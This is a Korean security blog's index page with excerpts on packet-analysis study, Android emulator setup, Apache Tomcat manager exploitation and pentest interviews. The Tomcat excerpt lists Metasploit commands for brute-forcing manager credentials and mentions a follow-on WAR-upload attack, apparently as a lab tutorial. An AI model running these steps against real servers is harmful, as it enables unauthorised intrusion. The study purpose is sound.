728x90 분류 전체보기263 패킷 분석 IT 보안 공부 방향 [도구] 1.와이어샤크 - 대표적인 패킷 분석 도구로 자주 사용됨 2.네트워크 마이너(newwork miner) - 패킷 분석 도구중 하나로 포렌식 업무에 종종 사용되는 소프트웨어 ※패킷 환경 구축이 힘들 경우 샘플 패킷을 사용하여 공부할 수 있다. - https://wiki.wireshark.org/SampleCaptures SampleCaptures wiki.wireshark.org 사이트에서 실습할 패킷들을 다운로드 받은 후 와이어샤크에서 불러와서 실습 가능 [중급 이상] 악성코드 난독화 패킷(암호화된 악성 패킷) 샘플 분석을 해본다. https://www.malware-traffic-analysis.net/ malware-traffic-analysis.net www.malware-traffic-a.. 2023. 12. 28. 안드로이드 가상환경을 구축하기 - Genymotion, 블루스택, Nox 1. 지니모션 https://www.genymotion.com/ Android Emulator on the Cloud and cross-platform - Genymotion Genymotion is an Android emulator "as a service" on the Cloud, as images for Cloud providers and locally for PC and Mac. www.genymotion.com 버추얼 박스와 같이 활용할 수 있는 지니 모션입니다. 버추얼 박스가 있는 경우 with virtual box 버전, 없으면 without으로 설치합니다. AVD처럼 가상 안드로이드 디바이스를 활용할 수 있기때문에 가상 안드로이드 모의해킹 환경을 만들기 좋습니다. 모든 기능을 사용하고자 .. 2023. 12. 28. Apache Tomcat 관리자 페이지 취약점 악용 - Metasploit 톰캣에서 [서버주소]:[서버포트]/manager/html 로 접속하게 되면 관리자 페이지 로그인 아이디와 비밀번호 입력 알림창이 뜬다. 이 상태에서 칼리에서 msfconsole을 틀어준다. >service postgresql start >msfconsole >search tomcat >use auxiliary/scanner/http/tomcat_mgr_login - mgr, 즉 매니저 로그인 취약점을 통해 아이디 비번을 알아낸다. >show options >set rhosts [서버아이피] >set rport [서버포트] >exploit 익스플로잇 후 성공한 목록의 아이디 비밀번호로 접속한다. 그 후 WAR file to deploy 탭을 활용한 취약점 해킹을 시도한다. >back >clear >sear.. 2023. 12. 28. 모의해킹 면접 등 취업 관련 https://blog.naver.com/chogar/221064193792 모의해킹 면접을 보기전에 고민하면 좋은 질문들(2017년 업데이트) 아래는 필자가 "모의해킹"이라는 단어에 시작하여 파생된 단어들을 가지고 만든 질문들입니다. 강의자료를 ... blog.naver.com https://blog.naver.com/chogar/221786760570 2023. 12. 28. 이전 1 ··· 12 13 14 15 16 17 18 ··· 66 다음 728x90